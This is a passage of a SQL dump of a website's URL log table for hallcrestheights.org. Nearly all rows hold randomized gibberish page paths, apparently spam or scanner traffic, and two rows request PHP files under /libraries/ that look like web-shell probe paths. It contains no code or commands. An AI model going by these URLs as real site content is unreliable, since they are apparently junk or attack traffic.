00:00:00'),(2382,'http://www.hallcrestheights.org/yemb-jvhtqqd-i20162630-ckzfltz-terqb-wnswn-k27245-snjplpf-trrj-ncypjoqw-gzjev-ihsdpa-caylh-yayzeue/',NULL,'','',1,0,'2017-01-07 02:48:16','0000-00-00 00:00:00'),(2383,'http://www.hallcrestheights.org/nfrk-opdobbu-i20162630-mgolzes-rkwtz-qtqbs-k6545-vjcwjbx-nmyv-sssldjzn-aahjb-kwxros-holvg-wxkwoih/',NULL,'','',1,0,'2017-01-07 02:49:16','0000-00-00 00:00:00'),(2384,'http://www.hallcrestheights.org/k42834-jglet-kymd-rqzn-rvmlkswa/zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv-oxbdjve-i20162636-ebikptj.htm',NULL,'','',1,0,'2017-01-07 02:50:16','0000-00-00 00:00:00'),(2385,'http://www.hallcrestheights.org/i20162630-qlbowci-ggece-ayafxr-k56473-glnikg-hhmbb/',NULL,'','',1,0,'2017-01-07 02:50:33','0000-00-00 00:00:00'),(2386,'http://www.hallcrestheights.org/ixnmu-eahw-i20162632-hioz-hjxbnwpg-k58264-eyooayik.htm',NULL,'','',1,0,'2017-01-07 02:51:17','0000-00-00 00:00:00'),(2387,'http://www.hallcrestheights.org/i20162630-yembjvh-tqqdc-kzfltz-k35773-terqbw-nswns/',NULL,'','',1,0,'2017-01-07 02:57:36','0000-00-00 00:00:00'),(2388,'http://www.hallcrestheights.org/k30240-edzvdlqc-omnnm-mcawvbfu-japyvrl-i20162628-flxh-qjkuh-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-07 03:01:09','0000-00-00 00:00:00'),(2389,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-i20162634-gmyhdecw-xbdeudk-ovfiib-ptquh-k4108-zxchhrmx.htm',NULL,'','',1,0,'2017-01-07 03:08:13','0000-00-00 00:00:00'),(2390,'http://www.hallcrestheights.org/kzpf-fmsxklr/i20162630-dedhwge-fvbbg-zagpe-k6395-ciyyuwu/',NULL,'','',1,0,'2017-01-07 03:08:19','0000-00-00 00:00:00'),(2391,'http://www.hallcrestheights.org/k50040-ryvhrhmq-tyysl-lgeajanp-dmefnxh-qfhj-i20162637-dyhao-xrcjhw-uvds.htm',NULL,'','',1,0,'2017-01-07 03:11:46','0000-00-00 00:00:00'),(2392,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-i20162635-zvkecqq-k15300-neei-aqjzl-nplqfc-nebx.htm',NULL,'','',1,0,'2017-01-07 03:15:17','0000-00-00 00:00:00'),(2393,'http://www.hallcrestheights.org/cwhri-i20162635-wgpekz/qdwkv-umzb-saiimjz-k35627-fozgdvdd/',NULL,'','',1,0,'2017-01-07 03:18:59','0000-00-00 00:00:00'),(2394,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp-i20162636-k21504-udzikmu.htm',NULL,'','',2,0,'2017-01-07 03:21:21','0000-00-00 00:00:00'),(2395,'http://www.hallcrestheights.org/i20162632-k47520-gnfznxvj-xpalt-itjshkyj-yldpija-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-07 03:22:20','0000-00-00 00:00:00'),(2396,'http://www.hallcrestheights.org/i20162632-k25920-ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-07 03:25:53','0000-00-00 00:00:00'),(2397,'http://www.hallcrestheights.org/i20162637-ryvhrh-mqtyys-llgeaj-anpd-mefnxh-qfhjdy-haoxr-cjhwuvd-k54876-svezytw-lcycws-cpuakqn.htm',NULL,'','',2,0,'2017-01-07 03:31:23','0000-00-00 00:00:00'),(2398,'http://www.hallcrestheights.org/lugdltrs-mxxhy-i20162634-pzqjllzo-hnjumnt-k56700-ecwf-ogywb-iwyrur-fgvf.htm',NULL,'','',1,0,'2017-01-07 03:32:57','0000-00-00 00:00:00'),(2399,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx-rdhcpgz-k39420-zdll-imvyx-jltfeo-i20162631-bkeb.htm',NULL,'','',1,0,'2017-01-07 03:36:28','0000-00-00 00:00:00'),(2400,'http://www.hallcrestheights.org/i20162630-tkuykfj-dnjjb-ucyupa-k33973-jaylrl-wfvdy/',NULL,'','',1,0,'2017-01-07 03:43:33','0000-00-00 00:00:00'),(2401,'http://www.hallcrestheights.org/k57500-vqjnyspv-holjp-i20162634-eurrtpil-uourxiv.htm',NULL,'','',8,0,'2017-01-07 03:44:25','0000-00-00 00:00:00'),(2402,'http://www.hallcrestheights.org/fadlajfn-i20162635-lgfpc/k16250-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',5,0,'2017-01-07 03:45:25','0000-00-00 00:00:00'),(2403,'http://www.hallcrestheights.org/company/topics/soho/2016/sharedspace.php',NULL,'','',7,0,'2017-01-07 03:47:33','0000-00-00 00:00:00'),(2404,'http://www.hallcrestheights.org/k16200-edzvdlqc-omnnm-mcawvbfu-i20162635-japyvrl-flxh-qjkuh-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-07 03:50:37','0000-00-00 00:00:00'),(2405,'http://www.hallcrestheights.org/k24808-upttmnb-eatgrbnq-i20162634-cdcncxrd-hcpgzzd-llimvy-xjltf-eobkebwi.htm',NULL,'','',1,0,'2017-01-07 03:54:11','0000-00-00 00:00:00'),(2406,'http://www.hallcrestheights.org/bsoap-i20162635-azapst/asgmh-cqcm-ckfrdtf-k12407-kgpvbchs/',NULL,'','',1,0,'2017-01-07 03:54:28','0000-00-00 00:00:00'),(2407,'http://www.hallcrestheights.org/i20162632-k52528-pcscqru-funpkwxp-oideotwt-vsoarmo-smgepl-alhel-iyrqiyqf.htm',NULL,'','',1,0,'2017-01-07 04:01:12','0000-00-00 00:00:00'),(2408,'http://www.hallcrestheights.org/ixnmu-i20162636-eahw-hioz-hjxbnwpg-k41884-eyooayik.htm',NULL,'','',1,0,'2017-01-07 04:04:29','0000-00-00 00:00:00'),(2409,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-i20162631-ijimjn-jbogt-k6773-sakb/',NULL,'','',1,0,'2017-01-07 04:04:44','0000-00-00 00:00:00'),(2410,'http://www.hallcrestheights.org/upttm-k42384-nbea-tgrb-nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke-bwivs-mqkrfbm-i20162636-lkmstho.htm',NULL,'','',1,0,'2017-01-07 04:05:29','0000-00-00 00:00:00'),(2411,'http://www.hallcrestheights.org/tkuykfjd-i20162633-njjb-ucyupaj-aylrlwfv-k18841-dyruqpkl-sdef-hxdf/',NULL,'','',1,0,'2017-01-07 04:06:28','0000-00-00 00:00:00'),(2412,'http://www.hallcrestheights.org/i20162636-fadla-jfnl/k21554-gfpc-vwgmyhde.htm',NULL,'','',1,0,'2017-01-07 04:07:30','0000-00-00 00:00:00'),(2413,'http://www.hallcrestheights.org/zmkuedt-i20162633-k10228-zjivyoqx-ifgxuhxp-tvuhmiw-nzkorp-vubfg-nqtpmhpr.htm',NULL,'','',1,0,'2017-01-07 04:08:16','0000-00-00 00:00:00'),(2414,'http://www.hallcrestheights.org/joifa/formmail/matsue_seminar.html',NULL,'','',3,0,'2017-01-07 04:09:30','0000-00-00 00:00:00'),(2415,'http://www.hallcrestheights.org/i20162636-ryvhr-hmqt/k22454-yysl-lgeajanp.htm',NULL,'','',1,0,'2017-01-07 04:10:30','0000-00-00 00:00:00'),(2416,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-i20162636-uourxivl-btrhnn-k22504-mtqzk.htm',NULL,'','',1,0,'2017-01-07 04:11:29','0000-00-00 00:00:00'),(2417,'http://www.hallcrestheights.org/bsoapaza-i20162633-k39941-psta-sgmhcqc-mckfrdtf/',NULL,'','',1,0,'2017-01-07 04:12:30','0000-00-00 00:00:00'),(2418,'http://www.hallcrestheights.org/i20162630-soeg-szxyife-tvtndyu-uhvfc-yzlsx-k6945-xqroxae-hksk-xyxembuq-udtwq-ceyvuc/',NULL,'','',1,0,'2017-01-07 04:13:30','0000-00-00 00:00:00'),(2419,'http://www.hallcrestheights.org/lugdltr-smxxhypz-i20162634-qjllzohn-jumntec-k25708-wfogyw-biwyr-urfgvfcw.htm',NULL,'','',1,0,'2017-01-07 04:15:20','0000-00-00 00:00:00'),(2420,'http://www.hallcrestheights.org/lugdl-i20162637-trsm/k1034-xxhy-pzqjllzo.htm',NULL,'','',1,0,'2017-01-07 04:15:30','0000-00-00 00:00:00'),(2421,'http://www.hallcrestheights.org/edzvd-i20162633-lqco-k16564-mnnm-mcawvbfu-japyvrlf-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-07 04:16:30','0000-00-00 00:00:00'),(2422,'http://www.hallcrestheights.org/kzpffmsx-klrd-edhwgef-vbbgzagp-eciyyuwu-i20162633-k18641-vfzt-jigj-inamz-bcng-tfmlyrg-hdfipw-gdqrk/',NULL,'','',1,0,'2017-01-07 04:17:31','0000-00-00 00:00:00'),(2423,'http://www.hallcrestheights.org/fadla-i20162633-jfnl-gfpc/vwgmyhde-cwxbdeud-kovfii-k16614-bptqu-hzxchh.htm',NULL,'','',1,0,'2017-01-07 04:18:31','0000-00-00 00:00:00'),(2424,'http://www.hallcrestheights.org/i20162632-vqjnysp-vholjpeu-k30928-rrtpiluo-urxivlb-trhnnm-tqzko-wtsxppbg.htm',NULL,'','',1,0,'2017-01-07 04:18:52','0000-00-00 00:00:00'),(2425,'http://www.hallcrestheights.org/i20162632-ixnmuea-hwhiozhj-xbnwpgey-ooayiku-k53428-ksszqc-ebaqd-omytniho.htm',NULL,'','',1,0,'2017-01-07 04:22:25','0000-00-00 00:00:00'),(2426,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-bzomsmvu-clzuphv-qawuox-i20162630-zmnpz-k58288-vsgcrlyc.htm',NULL,'','',1,0,'2017-01-07 04:25:59','0000-00-00 00:00:00'),(2427,'http://www.hallcrestheights.org/jgletky-mdrqznrv-mlkswazv-k59188-kecqqne-eiaqjz-i20162630-lnplq-fcnebxil.htm',NULL,'','',1,0,'2017-01-07 04:29:28','0000-00-00 00:00:00'),(2428,'http://www.hallcrestheights.org/yembjvh-tqqdc-kzfltz-i20162631-terqbw-nswns-k5873-njpl/',NULL,'','',1,0,'2017-01-07 04:33:02','0000-00-00 00:00:00'),(2429,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-jshkyjyl-dpijaam-durtae-i20162630-k37588-npggw-tdvlxtdq.htm',NULL,'','',1,0,'2017-01-07 04:36:32','0000-00-00 00:00:00'),(2430,'http://www.hallcrestheights.org/pcscq-rufu/npkw-i20162633-xpoideot-k16414-wtvsoarm.htm',NULL,'','',1,0,'2017-01-07 04:39:46','0000-00-00 00:00:00'),(2431,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh/k42234-xptvuhmi-wnzkor-i20162636-pvubf-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-07 04:40:58','0000-00-00 00:00:00'),(2432,'http://www.hallcrestheights.org/ixnmu-eahw/i20162637-hioz-hjxbnwpg-k934-eyooayik.htm',NULL,'','',1,0,'2017-01-07 04:43:25','0000-00-00 00:00:00'),(2433,'http://www.hallcrestheights.org/i20162632-upttmnb-eatgrbnq-cdcncxrd-hcpgzzd-llimvy-xjltf-k31828-eobkebwi.htm',NULL,'','',1,0,'2017-01-07 04:43:37','0000-00-00 00:00:00'),(2434,'http://www.hallcrestheights.org/ryvhr-hmqt-k42734-yysl-lgeajanp/dmefnxhq-fhjdyh-aoxrc-jhwuvd-i20162636-svezy-twlcycw-scpuakq-njtn.htm',NULL,'','',1,0,'2017-01-07 04:47:00','0000-00-00 00:00:00'),(2435,'http://www.hallcrestheights.org/cwhriwgp-k39241-ekzq-dwkvumz-bsaiimjz-fozgdvdd-i20162633-qjvd-obkn-lykco-nedw/',NULL,'','',1,0,'2017-01-07 04:49:24','0000-00-00 00:00:00'),(2436,'http://www.hallcrestheights.org/qlbowcig-k18591-gece-ayafxrg-i20162633-lnikghhm/bbxpgesm-rcai-ztbi-auwdt-vixp-mtzhzzw/',NULL,'','',1,0,'2017-01-07 04:51:49','0000-00-00 00:00:00'),(2437,'http://www.hallcrestheights.org/oiyizgol-i20162633-rcmw-fbsnopd-gfnhskrl-jrgfctfz-k39541-fiwx-wmak/',NULL,'','',1,0,'2017-01-07 04:53:01','0000-00-00 00:00:00'),(2438,'http://www.hallcrestheights.org/mrcqg-i20162636-beif/uwgr-abtnwyrq-k42334-semgwkow.htm',NULL,'','',1,0,'2017-01-07 04:55:26','0000-00-00 00:00:00'),(2439,'http://www.hallcrestheights.org/upttm-k58114-nbea-tgrb-nqcdcncx/i20162632-rdhcpgzz-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',1,0,'2017-01-07 04:56:38','0000-00-00 00:00:00'),(2440,'http://www.hallcrestheights.org/qlbowci-k7073-ggece-ayafxr-i20162631-glnikg/',NULL,'','',1,0,'2017-01-07 05:04:00','0000-00-00 00:00:00'),(2441,'http://www.hallcrestheights.org/ixnmu-eahw-k16664-hioz-hjxbnwpg-eyooayik-i20162633-uksszq.htm',NULL,'','',1,0,'2017-01-07 05:13:32','0000-00-00 00:00:00'),(2442,'http://www.hallcrestheights.org/i20162636-qlbowc-k10349-iggeceay-afxr-glnik/',NULL,'','',3,0,'2017-01-07 05:25:49','0000-00-00 00:00:00'),(2443,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k5720-vwgmyhde-cwxbdeu-i20162632-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-07 05:28:57','0000-00-00 00:00:00'),(2444,'http://www.hallcrestheights.org/i20162630-k7045-kzpf-fmsxklr-dedhwge-fvbbg-zagpe/',NULL,'','',1,0,'2017-01-07 05:32:46','0000-00-00 00:00:00'),(2445,'http://www.hallcrestheights.org/i20162632-pcscq-rufu-npkw/xpoideot-wtvsoarm-osmgep-k58014-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-07 05:33:58','0000-00-00 00:00:00'),(2446,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k4820-qxifgxuh-xptvuhm-i20162632-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-07 05:35:14','0000-00-00 00:00:00'),(2447,'http://www.hallcrestheights.org/i20162628-cwhriw-k47249-gpekzqdw-kvum-zbsai/',NULL,'','',2,0,'2017-01-07 05:38:17','0000-00-00 00:00:00'),(2448,'http://www.hallcrestheights.org/ryvhrhmq-tyysl-i20162636-k15980-lgeajanp-dmefnxh-qfhj-dyhao.htm',NULL,'','',1,0,'2017-01-07 05:41:24','0000-00-00 00:00:00'),(2449,'http://www.hallcrestheights.org/tkuykfj-k7973-dnjjb-ucyupa-i20162631-jaylrl/',NULL,'','',1,0,'2017-01-07 05:44:32','0000-00-00 00:00:00'),(2450,'http://www.hallcrestheights.org/nfrkop-k39149-dobbumgo-lzes-i20162635-rkwtz/',NULL,'','',3,0,'2017-01-07 05:50:45','0000-00-00 00:00:00'),(2451,'http://www.hallcrestheights.org/i20162634-fadlajfn-lgfpc-k57200-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-07 05:53:53','0000-00-00 00:00:00'),(2452,'http://www.hallcrestheights.org/dvisciwb-vwkux-k50540-krbzomsm-i20162637-vuclzup-hvqa-wuoxz.htm',NULL,'','',2,0,'2017-01-07 06:03:13','0000-00-00 00:00:00'),(2453,'http://www.hallcrestheights.org/i20162628-yembjv-k48149-htqqdckz-fltz-terqb/',NULL,'','',1,0,'2017-01-07 06:12:35','0000-00-00 00:00:00'),(2454,'http://www.hallcrestheights.org/ajqxxuc-k57473-uzaof-i20162630-ifephi-ijimjn/',NULL,'','',1,0,'2017-01-07 06:21:55','0000-00-00 00:00:00'),(2455,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-k49640-abtnwyrq-i20162637-semgwko-whme-mxgku.htm',NULL,'','',3,0,'2017-01-07 06:25:02','0000-00-00 00:00:00'),(2456,'http://www.hallcrestheights.org/kzpf-k27845-fmsxklr-i20162630-dedhwge-fvbbg/',NULL,'','',1,0,'2017-01-07 06:28:09','0000-00-00 00:00:00'),(2457,'http://www.hallcrestheights.org/gnfznxvj-xpalt-k46220-itjshkyj-yldpija-i20162632-amdu-rtaen.htm',NULL,'','',1,0,'2017-01-07 06:31:16','0000-00-00 00:00:00'),(2458,'http://www.hallcrestheights.org/zmku-edtzjiv-i20162630-k44132-yoqxi-fgxuhx-ptvuhmi-wnzkorpv.htm',NULL,'','',1,0,'2017-01-07 06:34:51','0000-00-00 00:00:00'),(2459,'http://www.hallcrestheights.org/fadlajfn-lgfpc-i20162636-k15080-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-07 06:40:37','0000-00-00 00:00:00'),(2460,'http://www.hallcrestheights.org/jgletkym-i20162635-drqzn-k37400-rvmlkswa-zvkecqq-neei-aqjzl.htm',NULL,'','',1,0,'2017-01-07 06:43:44','0000-00-00 00:00:00'),(2461,'http://www.hallcrestheights.org/i20162628-ixnm-ueahwhi-k26492-ozhjx-bnwpge-yooayik-uksszqce.htm',NULL,'','',3,0,'2017-01-07 06:49:58','0000-00-00 00:00:00'),(2462,'http://www.hallcrestheights.org/k16964-jglet-i20162633-kymd-rqzn-rvmlkswa.htm',NULL,'','',1,0,'2017-01-07 06:51:00','0000-00-00 00:00:00'),(2463,'http://www.hallcrestheights.org/tkuykfj-k54773-dnjjb-i20162630-ucyupa-jaylrl/',NULL,'','',1,0,'2017-01-07 06:56:12','0000-00-00 00:00:00'),(2464,'http://www.hallcrestheights.org/ajqxxuc-k34073-uzaof-i20162630-ifephi-ijimjn/',NULL,'','',1,0,'2017-01-07 07:05:34','0000-00-00 00:00:00'),(2465,'http://www.hallcrestheights.org/oiyizgol-k61901-rcmw-fbsnopd-i20162631-gfnhskrl/',NULL,'','',3,0,'2017-01-07 07:11:49','0000-00-00 00:00:00'),(2466,'http://www.hallcrestheights.org/htxwhykr-k55781-svsv-i20162634-hudykbq-xdosfiet/',NULL,'','',3,0,'2017-01-07 07:14:54','0000-00-00 00:00:00'),(2467,'http://www.hallcrestheights.org/jgle-tkymdrq-k53312-znrvm-lkswaz-vkecqqn-i20162633-eeiaqjzl.htm',NULL,'','',1,0,'2017-01-07 07:21:23','0000-00-00 00:00:00'),(2468,'http://www.hallcrestheights.org/cwhriwgp-k35081-ekzq-i20162634-dwkvumz-bsaiimjz/',NULL,'','',3,0,'2017-01-07 07:24:15','0000-00-00 00:00:00'),(2469,'http://www.hallcrestheights.org/i20162634-vqjn-yspvhol-k11012-jpeur-rtpilu-ourxivl-btrhnnmt.htm',NULL,'','',1,0,'2017-01-07 07:33:37','0000-00-00 00:00:00'),(2470,'http://www.hallcrestheights.org/ryvh-rhmqtyy-i20162630-k22532-sllge-ajanpd-mefnxhq-fhjdyhao.htm',NULL,'','',1,0,'2017-01-07 07:42:57','0000-00-00 00:00:00'),(2471,'http://www.hallcrestheights.org/dvisciwb-i20162635-vwkux-k36500-krbzomsm-vuclzup-hvqa-wuoxz.htm',NULL,'','',1,0,'2017-01-07 07:46:04','0000-00-00 00:00:00'),(2472,'http://www.hallcrestheights.org/i20162635-yembjv-htqqdckz-fltz-terqb-k39049-wnsw/',NULL,'','',3,0,'2017-01-07 07:52:19','0000-00-00 00:00:00'),(2473,'http://www.hallcrestheights.org/kzpffms-xklrd-i20162630-edhwge-fvbbgz-agpec-k57173-iyyu/',NULL,'','',1,0,'2017-01-07 07:58:35','0000-00-00 00:00:00'),(2474,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-i20162631-vtzpxb-xkcwj-k60953-ybty/',NULL,'','',1,0,'2017-01-07 08:07:54','0000-00-00 00:00:00'),(2475,'http://www.hallcrestheights.org/upttmnbe-atgrb-k26420-nqcdcncx-rdhcpgz-i20162632-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-07 08:14:07','0000-00-00 00:00:00'),(2476,'http://www.hallcrestheights.org/nfrkopd-obbum-i20162630-golzes-rkwtzq-tqbsv-k55373-jcwj/',NULL,'','',1,0,'2017-01-07 08:17:15','0000-00-00 00:00:00'),(2477,'http://www.hallcrestheights.org/i20162628-vqjn-yspvhol-k27392-jpeur-rtpilu-ourxivl-btrhnnmt.htm',NULL,'','',2,0,'2017-01-07 08:20:22','0000-00-00 00:00:00'),(2478,'http://www.hallcrestheights.org/vqjnyspv-holjp-k25520-eurrtpil-uourxiv-i20162632-lbtr-hnnmt.htm',NULL,'','',1,0,'2017-01-07 08:26:35','0000-00-00 00:00:00'),(2479,'http://www.hallcrestheights.org/pcscqruf-unpkw-k47120-xpoideot-wtvsoar-i20162632-mosm-gepla.htm',NULL,'','',1,0,'2017-01-07 08:32:50','0000-00-00 00:00:00'),(2480,'http://www.hallcrestheights.org/i20162628-gnfz-nxvjxpa-k48092-ltitj-shkyjy-ldpijaa-mdurtaen.htm',NULL,'','',3,0,'2017-01-07 08:35:56','0000-00-00 00:00:00'),(2481,'http://www.hallcrestheights.org/xhajvq-i20162629-lwczbiqs-osqx-oqkgq-aqyd-k26249-cptznzv/',NULL,'','',1,0,'2017-01-07 08:42:11','0000-00-00 00:00:00'),(2482,'http://www.hallcrestheights.org/pcscqruf-i20162635-unpkw-k16700-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',1,0,'2017-01-07 08:51:32','0000-00-00 00:00:00'),(2483,'http://www.hallcrestheights.org/dvisci-wbvwku-xkrbzo-i20162635-msmv-uclzup-k9616-hvqawu-oxzmn.htm',NULL,'','',2,0,'2017-01-07 08:54:39','0000-00-00 00:00:00'),(2484,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-rkwtz-i20162632-qtqb-k60989-svjcwjb/',NULL,'','',3,0,'2017-01-07 08:57:45','0000-00-00 00:00:00'),(2485,'http://www.hallcrestheights.org/kzpffmsx-k29041-klrd-edhwgef-i20162633-vbbgzagp-eciyyuwu/',NULL,'','',1,0,'2017-01-07 09:00:53','0000-00-00 00:00:00'),(2486,'http://www.hallcrestheights.org/kzpffm-i20162629-sxklrded-hwge-fvbbg-zagp-k25349-eciyyuw/',NULL,'','',3,0,'2017-01-07 09:07:06','0000-00-00 00:00:00'),(2487,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-dgfnh-skrl-i20162633-k18689-jrgfctf/',NULL,'','',1,0,'2017-01-07 09:10:13','0000-00-00 00:00:00'),(2488,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj-i20162632-njbo-k59189-gtsakbc/',NULL,'','',1,0,'2017-01-07 09:16:27','0000-00-00 00:00:00'),(2489,'http://www.hallcrestheights.org/jgletk-ymdrqz-nrvmlk-swaz-vkecqq-i20162637-k54976-neeiaq-jzlnp.htm',NULL,'','',1,0,'2017-01-07 09:19:34','0000-00-00 00:00:00'),(2490,'http://www.hallcrestheights.org/i20162634-dvisciw-bvwkuxkr-k4208-bzomsmvu-clzuphv-qawuox-zmnpz.htm',NULL,'','',5,0,'2017-01-07 09:25:49','0000-00-00 00:00:00'),(2491,'http://www.hallcrestheights.org/lugdlt-rsmxxh-i20162634-ypzqjl-lzoh-k51916-njumnt-ecwfog-ywbiw.htm',NULL,'','',3,0,'2017-01-07 09:32:03','0000-00-00 00:00:00'),(2492,'http://www.hallcrestheights.org/kzpffmsx-i20162631-k61801-klrd-edhwgef-vbbgzagp-eciyyuwu/',NULL,'','',3,0,'2017-01-07 09:35:11','0000-00-00 00:00:00'),(2493,'http://www.hallcrestheights.org/k6664-pcscq-i20162633-rufu-npkw-xpoideot-wtvsoarm-osmgep-lalhe.htm',NULL,'','',1,0,'2017-01-07 09:41:23','0000-00-00 00:00:00'),(2494,'http://www.hallcrestheights.org/jgletk-ymdrqz-k10516-nrvmlk-i20162635-swaz-vkecqq-neeiaq-jzlnp.htm',NULL,'','',2,0,'2017-01-07 09:47:37','0000-00-00 00:00:00'),(2495,'http://www.hallcrestheights.org/i20162628-nfrkop-dobbumgo-lzes-rkwtz-qtqb-k46949-svjcwjb/',NULL,'','',1,0,'2017-01-07 09:53:51','0000-00-00 00:00:00'),(2496,'http://www.hallcrestheights.org/gnfzn-i20162633-xvjx-palt-k5764-itjshkyj-yldpijaa-mdurta-enpgg.htm',NULL,'','',1,0,'2017-01-07 10:00:05','0000-00-00 00:00:00'),(2497,'http://www.hallcrestheights.org/k33376-gnfznx-vjxpal-titjsh-kyjy-ldpija-i20162637-amdurt-aenpg.htm',NULL,'','',1,0,'2017-01-07 10:03:12','0000-00-00 00:00:00'),(2498,'http://hallcrestheights.org//libraries/lola.php',NULL,'','',1,0,'2017-01-07 10:03:23','0000-00-00 00:00:00'),(2499,'http://hallcrestheights.org//libraries/legacy/log/v_5.php',NULL,'','',1,0,'2017-01-07 10:03:25','0000-00-00 00:00:00'),(2500,'http://www.hallcrestheights.org/soegsz-xyifetvt-i20162636-ndyu-uhvfc-yzls-k10949-xxqroxa/',NULL,'','',4,0,'2017-01-07 10:06:20','0000-00-00 00:00:00'),(2501,'http://www.hallcrestheights.org/dvisci-k54076-wbvwku-xkrbzo-msmv-uclzup-i20162637-hvqawu-oxzmn.htm',NULL,'','',1,0,'2017-01-07 10:12:33','0000-00-00 00:00:00'),(2502,'http://www.hallcrestheights.org/jglet-i20162633-k10984-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl.htm',NULL,'','',1,0,'2017-01-07 10:15:40','0000-00-00 00:00:00'),(2503,'http://www.hallcrestheights.org/i20162632-ryvhr-hmqt-k31684-yysl-lgeajanp-dmefnxhq-fhjdyh-aoxrc.htm',NULL,'','',2,0,'2017-01-07 10:25:02','0000-00-00 00:00:00'),(2504,'http://www.hallcrestheights.org/xhaj-vqlwczb-iqsosqx/oqkgq-aqydc-i20162629-ptznzvt-jqoe-k6255-vpcaqwja/',NULL,'','',1,0,'2017-01-07 10:25:20','0000-00-00 00:00:00'),(2505,'http://www.hallcrestheights.org/ajqxx-i20162635-ucuzao-fifep-hiij-imjnjbo-k12857-gtsakbcc/',NULL,'','',1,0,'2017-01-07 10:28:08','0000-00-00 00:00:00'),(2506,'http://www.hallcrestheights.org/i20162632-lugdl-trsm-xxhy-k52384-pzqjllzo-hnjumnte-cwfogy-wbiwy.htm',NULL,'','',2,0,'2017-01-07 10:37:29','0000-00-00 00:00:00'),(2507,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz-qdwkvum-zbsai-imjzf-k16205-ozgdvdd/',NULL,'','',3,0,'2017-01-07 10:40:36','0000-00-00 00:00:00'),(2508,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-k52384-pzqjllzo-i20162636-hnjumnte-cwfogy-wbiwy.htm',NULL,'','',2,0,'2017-01-07 10:46:50','0000-00-00 00:00:00'),(2509,'http://www.hallcrestheights.org/yembj-i20162635-vhtqqd-ckzfl-tzte-rqbwnsw-k11957-nsnjplpf/',NULL,'','',1,0,'2017-01-07 10:49:58','0000-00-00 00:00:00'),(2510,'http://www.hallcrestheights.org/i20162632-k53284-zmkue-dtzj-ivyo-qxifgxuh-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',3,0,'2017-01-07 10:53:04','0000-00-00 00:00:00'),(2511,'http://www.hallcrestheights.org/i20162634-tkuyk-fjdnjj-bucyu-paja-ylrlwfv-k33557-dyruqpkl/',NULL,'','',1,0,'2017-01-07 10:59:19','0000-00-00 00:00:00'),(2512,'http://www.hallcrestheights.org/k43204-gnfzn-xvjx-palt-itjshkyj-i20162636-yldpijaa-mdurta-enpgg.htm',NULL,'','',1,0,'2017-01-07 11:05:46','0000-00-00 00:00:00'),(2513,'http://www.hallcrestheights.org/ixnmu-eahw-k21604-hioz-hjxbnwpg-i20162636-eyooayik-uksszq-cebaq.htm',NULL,'','',1,0,'2017-01-07 11:08:40','0000-00-00 00:00:00'),(2514,'http://www.hallcrestheights.org/qlbo-wciggec-i20162630-eayafxr-glnik-ghhmb-k16745-bxpgesm/',NULL,'','',4,0,'2017-01-07 11:11:46','0000-00-00 00:00:00'),(2515,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-i20162630-k58388-jshkyjyl-dpijaam-durtae-npggw.htm',NULL,'','',1,0,'2017-01-07 11:14:53','0000-00-00 00:00:00'),(2516,'http://www.hallcrestheights.org/i20162634-fadlajf-nlgfpcvw-k24908-gmyhdecw-xbdeudk-ovfiib-ptquh.htm',NULL,'','',3,0,'2017-01-07 11:21:08','0000-00-00 00:00:00'),(2517,'http://www.hallcrestheights.org/i20162632-fadla-jfnl-gfpc-vwgmyhde-k54184-cwxbdeud-kovfii-bptqu.htm',NULL,'','',1,0,'2017-01-07 11:27:21','0000-00-00 00:00:00'),(2518,'http://www.hallcrestheights.org/pcscqru-funpkwxp-i20162630-k59288-oideotwt-vsoarmo-smgepl-alhel.htm',NULL,'','',1,0,'2017-01-07 11:33:36','0000-00-00 00:00:00'),(2519,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-k42304-mcawvbfu-i20162636-japyvrlf-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-07 11:42:58','0000-00-00 00:00:00'),(2520,'http://www.hallcrestheights.org/i20162634-ryvhrhm-qtyysllg-k25808-eajanpdm-efnxhqf-hjdyha-oxrcj.htm',NULL,'','',3,0,'2017-01-07 11:46:03','0000-00-00 00:00:00'),(2521,'http://www.hallcrestheights.org/edzvd-i20162633-lqco-mnnm-mcawvbfu-japyvrlf-k11884-lxhqjk-uhkcm.htm',NULL,'','',1,0,'2017-01-07 11:52:18','0000-00-00 